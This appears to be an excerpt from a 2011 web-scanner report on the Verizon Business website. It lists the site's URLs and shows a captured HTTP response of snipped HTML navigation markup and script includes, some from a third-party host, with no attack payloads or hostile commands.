http://www.verizonbusiness.com/products/contactcenter/workforce/
http://www.verizonbusiness.com/products/cpe/
http://www.verizonbusiness.com/products/cpe/financing/
http://www.verizonbusiness.com/products/cpe/maintenance/
http://www.verizonbusiness.com/products/cpe/portfolio/
http://www.verizonbusiness.com/products/cpe/siteservices/
http://www.verizonbusiness.com/products/cpe/storage/
http://www.verizonbusiness.com/products/data/
http://www.verizonbusiness.com/products/data/atm/
http://www.verizonbusiness.com/products/data/dedicated/
http://www.verizonbusiness.com/products/data/digital/
http://www.verizonbusiness.com/products/data/ethernet/
http://www.verizonbusiness.com/products/data/framerelay/
http://www.verizonbusiness.com/products/data/privateip/
http://www.verizonbusiness.com/products/data/privateip2/
http://www.verizonbusiness.com/products/data/privateline/
http://www.verizonbusiness.com/products/data/remote/
http://www.verizonbusiness.com/products/data/ring/
http://www.verizonbusiness.com/products/data/sig/
http://www.verizonbusiness.com/products/data/transaction/
http://www.verizonbusiness.com/products/data/vpls/
http://www.verizonbusiness.com/products/internet/
http://www.verizonbusiness.com/products/internet/dedicated/
http://www.verizonbusiness.com/products/internet/dial/
http://www.verizonbusiness.com/products/internet/dsl/
http://www.verizonbusiness.com/products/internet/fios/
http://www.verizonbusiness.com/products/internet/satellite/
http://www.verizonbusiness.com/products/itsolutions/
http://www.verizonbusiness.com/products/itsolutions/akamai/
http://www.verizonbusiness.com/products/itsolutions/apphosting/
http://www.verizonbusiness.com/products/itsolutions/backuprestore/
http://www.verizonbusiness.com/products/itsolutions/caas/
http://www.verizonbusiness.com/products/itsolutions/datacenter/
http://www.verizonbusiness.com/products/itsolutions/messaging/
http://www.verizonbusiness.com/products/itsolutions/remote/
http://www.verizonbusiness.com/products/itsolutions/server_monitoring/
http://www.verizonbusiness.com/products/itsolutions/servicedesk/
http://www.verizonbusiness.com/products/itsolutions/virtualization/
http://www.verizonbusiness.com/products/managed/
http://www.verizonbusiness.com/products/managed/chain/
http://www.verizonbusiness.com/products/managed/invoice/
http://www.verizonbusiness.com/products/managed/ippbx/
http://www.verizonbusiness.com/products/managed/items/
http://www.verizonbusiness.com/products/managed/lan/
http://www.verizonbusiness.com/products/managed/professional/
http://www.verizonbusiness.com/products/managed/wan/
http://www.verizonbusiness.com/products/managed/wanoptimization/
http://www.verizonbusiness.com/products/managed/wirelesslan/
http://www.verizonbusiness.com/products/security/
http://www.verizonbusiness.com/products/security/compliance/
http://www.verizonbusiness.com/products/security/cpe/
http://www.verizonbusiness.com/products/security/govt/
http://www.verizonbusiness.com/products/security/identity/
http://www.verizonbusiness.com/products/security/managed/
http://www.verizonbusiness.com/products/security/professional/
http://www.verizonbusiness.com/products/security/risk/
http://www.verizonbusiness.com/products/voice/
http://www.verizonbusiness.com/products/voice/911/
http://www.verizonbusiness.com/products/voice/callingcards/
http://www.verizonbusiness.com/products/voice/inbound/
http://www.verizonbusiness.com/products/voice/local/
http://www.verizonbusiness.com/products/voice/outbound/
http://www.verizonbusiness.com/products/voip/
http://www.verizonbusiness.com/products/voip/centrex/
http://www.verizonbusiness.com/products/voip/ipflex/
http://www.verizonbusiness.com/products/voip/ippbx/
http://www.verizonbusiness.com/products/voip/profsvcs/
http://www.verizonbusiness.com/products/voip/trunking/
http://www.verizonbusiness.com/products/wireless/
http://www.verizonbusiness.com/products/wireless/backup/
http://www.verizonbusiness.com/products/wireless/emaildata/
http://www.verizonbusiness.com/products/wireless/pbx/
http://www.verizonbusiness.com/products/wireless/wirelessvoice/
http://www.verizonbusiness.com/pt/
http://www.verizonbusiness.com/resources/
http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml
http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml
http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml
http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml
http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml
http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml
http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml
http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml
http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml
http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml
http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml
http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml
http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml
http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml
http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml
http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml
http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml
http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml
http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml
http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml
http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml
http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml
http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml
http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml
http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml
http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml
http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml
http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml
http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml
http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml
http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml
http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml
http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml
http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml
http://www.verizonbusiness.com/resources/1002a3a11-111-Blog.xml
http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml
http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml
http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml
http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml
http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml
http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml
http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml
http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml
http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml
http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml
http://www.verizonbusiness.com/se/
http://www.verizonbusiness.com/se/solutions/var/
http://www.verizonbusiness.com/sg/
http://www.verizonbusiness.com/sitemap/
http://www.verizonbusiness.com/solutions/
http://www.verizonbusiness.com/solutions/application/
http://www.verizonbusiness.com/solutions/business.xml
http://www.verizonbusiness.com/solutions/category.xml
http://www.verizonbusiness.com/solutions/collaboration/
http://www.verizonbusiness.com/solutions/communications/
http://www.verizonbusiness.com/solutions/continuity/
http://www.verizonbusiness.com/solutions/education/
http://www.verizonbusiness.com/solutions/finance/
http://www.verizonbusiness.com/solutions/government/
http://www.verizonbusiness.com/solutions/green/
http://www.verizonbusiness.com/solutions/healthcare/
http://www.verizonbusiness.com/solutions/industry.xml
http://www.verizonbusiness.com/solutions/itsolutions/
http://www.verizonbusiness.com/solutions/markets/
http://www.verizonbusiness.com/solutions/mobility/
http://www.verizonbusiness.com/solutions/network/
http://www.verizonbusiness.com/solutions/professional/
http://www.verizonbusiness.com/solutions/retail/
http://www.verizonbusiness.com/solutions/security/
http://www.verizonbusiness.com/solutions/teleworking/
http://www.verizonbusiness.com/solutions/var/index.xml
http://www.verizonbusiness.com/solutions/wholesale/
http://www.verizonbusiness.com/solutions/wholesale/ips/
http://www.verizonbusiness.com/solutions/wholesale/us/
http://www.verizonbusiness.com/support/
http://www.verizonbusiness.com/support/myaccount/
http://www.verizonbusiness.com/support/myaccount/tools/
http://www.verizonbusiness.com/support/myaccount/tools/center/
http://www.verizonbusiness.com/support/myaccount/tools/ebonding/
http://www.verizonbusiness.com/support/myaccount/tools/edibilling/
http://www.verizonbusiness.com/templates/hbx.js
http://www.verizonbusiness.com/templates/vzbar/logo.gif
http://www.verizonbusiness.com/terms/
http://www.verizonbusiness.com/tw/
http://www.verizonbusiness.com/uk/
http://www.verizonbusiness.com/uk/solutions/var/
http://www.verizonbusiness.com/us/
http://www.verizonbusiness.com/us/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml
http://www.verizonbusiness.com/us/solutions/var/
http://www.verizonbusiness.com/ve/
http://www.verizonbusiness.jobs/
https://customercenter.verizonbusiness.com/

Request

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:05 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 70987

                   <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...
<meta name="description" content="Your enterprise faces complex challenges. And to be more competitive, you have to address them all. You need to merge complex networks as you ">
<script src="http://www.verizonbusiness.com/(none20:54:40)/templates/vzbcann/site.js" type="text/javascript" language="JavaScript"></script>
...[SNIP]...
</script>

   <link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css" />
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/gn_engine.js"></script>
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/search.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb000035a2/publish/includes/css/default.css" />

<script type="text/javaScript">
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://www.verizonbusiness.com//(none18:52:08)/templates/vzbar/site.js">
</script>
...[SNIP]...
</a><a accesskey="1" title="Home" class="logo" name="&lid=logo" href="http://www.verizonbusiness.com/"><img src="http://www.verizonbusiness.com/templates/vzbar/logo.gif" alt="Verizon Business" class="logo" height="55" width="152" /></a>
...[SNIP]...
<li class="t left"><a href="http://www.verizonbusiness.com/support/">Contact Us</a>
...[SNIP]...
<li onMouseOut="if(self.vzDO)vzDO(this);" onMouseOver="if(self.vzDD)vzDD(this);" id="changecountry" class="t right"><a class="down" href="http://www.verizonbusiness.com/countries/">Worldwide Site</a>
...[SNIP]...
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col1"><a href="http://www.verizonbusiness.com/solutions/" name="&lpos=topnav">Solutions</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/solutions/category.xml">Explore by Category</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/itsolutions/">IT Solutions</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/security/">Security Solutions</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/communications/">Communications Solutions</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/network/">Network Solutions</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/professional/">Professional Services</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/solutions/industry.xml">Explore by Industry</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/education/">Education</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/finance/">Financial Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/government/">Government</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/healthcare/">Healthcare</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/retail/">Retail</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/solutions/business.xml">Explore by Business Need</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/application/">Application and Performance Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/continuity/">Business Continuity</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/markets/">Expanding Your Global Business</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/green/">Going Green</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/mobility/">Mobility</a></li>
<li><a href="http://www.verizonbusiness.com/solutions/teleworking/">Teleworking</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/collaboration/">Unified Communications and Collaboration</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/solutions/wholesale/">Carrier & Wholesale</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/wholesale/us/">United States</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/wholesale/ips/">International</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/solutions/var/index.xml">Channel Partners & VARs</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/de/solutions/var/">Germany</a></li>
<li><a href="http://www.verizonbusiness.com/it/solutions/var/">Italy</a></li>
<li><a href="http://www.verizonbusiness.com/nl/solutions/var/">Netherlands</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/se/solutions/var/">Sweden</a></li>
<li><a href="http://www.verizonbusiness.com/uk/solutions/var/">United Kingdom</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/us/solutions/var/">United States</a>
...[SNIP]...
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col2"><a href="http://www.verizonbusiness.com/products/" name="&lpos=topnav">Products</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/voip/">VoIP</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voip/ipflex/">IP Flexible T1</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voip/trunking/">IP Trunking Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voip/centrex/">Hosted IP Centrex</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voip/ippbx/">Managed IP PBX</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voip/profsvcs/">Professional Services</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/data/">Data and IP Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/privateip/">Private IP Layer 3</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/privateip2/">Private IP Layer 2</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/vpls/">VPLS</a></li>
<li><a href="http://www.verizonbusiness.com/products/data/ethernet/">Ethernet Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/dedicated/">IP VPN Dedicated</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/remote/">Remote VPN</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/sig/">Secure Gateway</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/framerelay/">Frame Relay</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/atm/">ATM</a></li>
<li><a href="http://www.verizonbusiness.com/products/data/privateline/">Private Line</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/ring/">Ring Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/transaction/">Transaction Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/digital/">Digital Media</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/wireless/">Wireless</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/wireless/wirelessvoice/">Wireless Voice Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/wireless/emaildata/">E-mail and Data Access</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/wireless/pbx/">PBX Mobile Extension</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/wireless/backup/">Wireless Backup</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/internet/">Internet Access</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/internet/dsl/">DSL and Cable</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/internet/dedicated/">Dedicated Access</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/internet/satellite/">Satellite Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/internet/dial/">Dial-Up</a></li>
<li><a href="http://www.verizonbusiness.com/products/internet/fios/">FiOS</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/security/">Security</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/professional/">Professional Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/managed/">Managed Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/compliance/">Compliance and Governance</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/identity/">Identity & Authentication Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/govt/">Government Programs</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/cpe/">CPE Resale</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/risk/">Risk Team</a>
...[SNIP]...
<li><a href="http://securityblog.verizonbusiness.com/">Security Blog</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/itsolutions/">IT Solutions and Hosting</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/caas/">Computing as a Service (CaaS)</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/apphosting/">IP Application Hosting</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/remote/">Remote IP Application Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/datacenter/">Data Center Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/virtualization/">Virtualization</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/backuprestore/">Backup and Restore Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/servicedesk/">IT Service Desk</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/server_monitoring/">Automated Server Monitoring and Remediation Service</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/akamai/">Akamai Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/messaging/">Hosted E-mail and Instant Messaging</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/managed/">Managed Networks</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/wanoptimization/">Managed WAN Optimization Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/wan/">WAN Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/lan/">LAN Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/wirelesslan/">Managed Wireless LAN</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/ippbx/">Managed IP PBX</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/professional/">Professional Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/chain/">Custom Supply Chain Managed Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/invoice/">Invoice Automation Service</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/items/">Telecom Expense Management</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/cpe/">Premises Equipment (CPE)</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/cpe/portfolio/">CPE Portfolio</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/cpe/maintenance/">CPE Maintenance</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/cpe/storage/">Storage CPE</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/cpe/siteservices/">Site Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/cpe/financing/">Ordering and Financing</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/contactcenter/">Contact Centers</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/acd/">Automatic Call Distribution</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/ip/">IP Contact Center</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/intelligent/">Intelligent Contact Routing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/speech/">Interactive Voice Response</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/workforce/">Workforce Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/quality/">Quality Monitoring</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/profsvcs/">Professional Services</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/conferencing/">Conferencing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/conferencing/audio/">Audio Conferencing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/conferencing/web/">Web Conferencing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/conferencing/video/">Video Conferencing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/conferencing/calculator/">Conferencing Calculator</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/voice/">Voice</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voice/local/">U.S. Local Voice Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voice/outbound/">Global Outbound Voice Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voice/inbound/">Global Inbound Voice Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voice/callingcards/">Calling Cards</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voice/911/">911 Services</a>
...[SNIP]...
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col3"><a href="http://www.verizonbusiness.com/resources/" name="&lpos=topnav">Resource Center</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml" name="&lpos=topnav">Education</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml" name="&lpos=topnav">Financial</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml" name="&lpos=topnav">Government</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml" name="&lpos=topnav">Healthcare</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml" name="&lpos=topnav">Retail</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml" name="&lpos=topnav">Application & Performance Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml" name="&lpos=topnav">Business Continuity</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml" name="&lpos=topnav">Conferencing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml" name="&lpos=topnav">Connecting Business Information</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml" name="&lpos=topnav">Contact Centers</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml" name="&lpos=topnav">Controlling Costs</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml" name="&lpos=topnav">Data and IP Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml" name="&lpos=topnav">Executive Leadership Series</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml" name="&lpos=topnav">Expanding Into New Markets</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml" name="&lpos=topnav">Going Green</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml" name="&lpos=topnav">Improving Productivity</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml" name="&lpos=topnav">Internet Access</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml" name="&lpos=topnav">IT Solutions and Hosting</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml" name="&lpos=topnav">Managed Networks</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml" name="&lpos=topnav">Mobility</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml" name="&lpos=topnav">Premises Equipment</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml" name="&lpos=topnav">Professional Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml" name="&lpos=topnav">Security</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml" name="&lpos=topnav">Securing Your Enterprise</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml" name="&lpos=topnav">Voice</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml" name="&lpos=topnav">Unified Communications and Collaboration</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml" name="&lpos=topnav">VoIP</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml" name="&lpos=topnav">Wireless</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml" name="&lpos=topnav">Virtualization</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml" name="&lpos=topnav">Teleworking</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml" name="&lpos=topnav">Think Forward</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml" name="&lpos=topnav">Small & Medium Business</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml" name="&lpos=topnav">Analyst Reports</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml" name="&lpos=topnav">Awards and Recognition</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a11-111-Blog.xml" name="&lpos=topnav">Blog</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml" name="&lpos=topnav">Case Studies</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml" name="&lpos=topnav">Executive Briefs</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml" name="&lpos=topnav">Fact Sheets & Brochures</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml" name="&lpos=topnav">Newsletter</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml" name="&lpos=topnav">Podcasts</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml" name="&lpos=topnav">Tools</a></li>
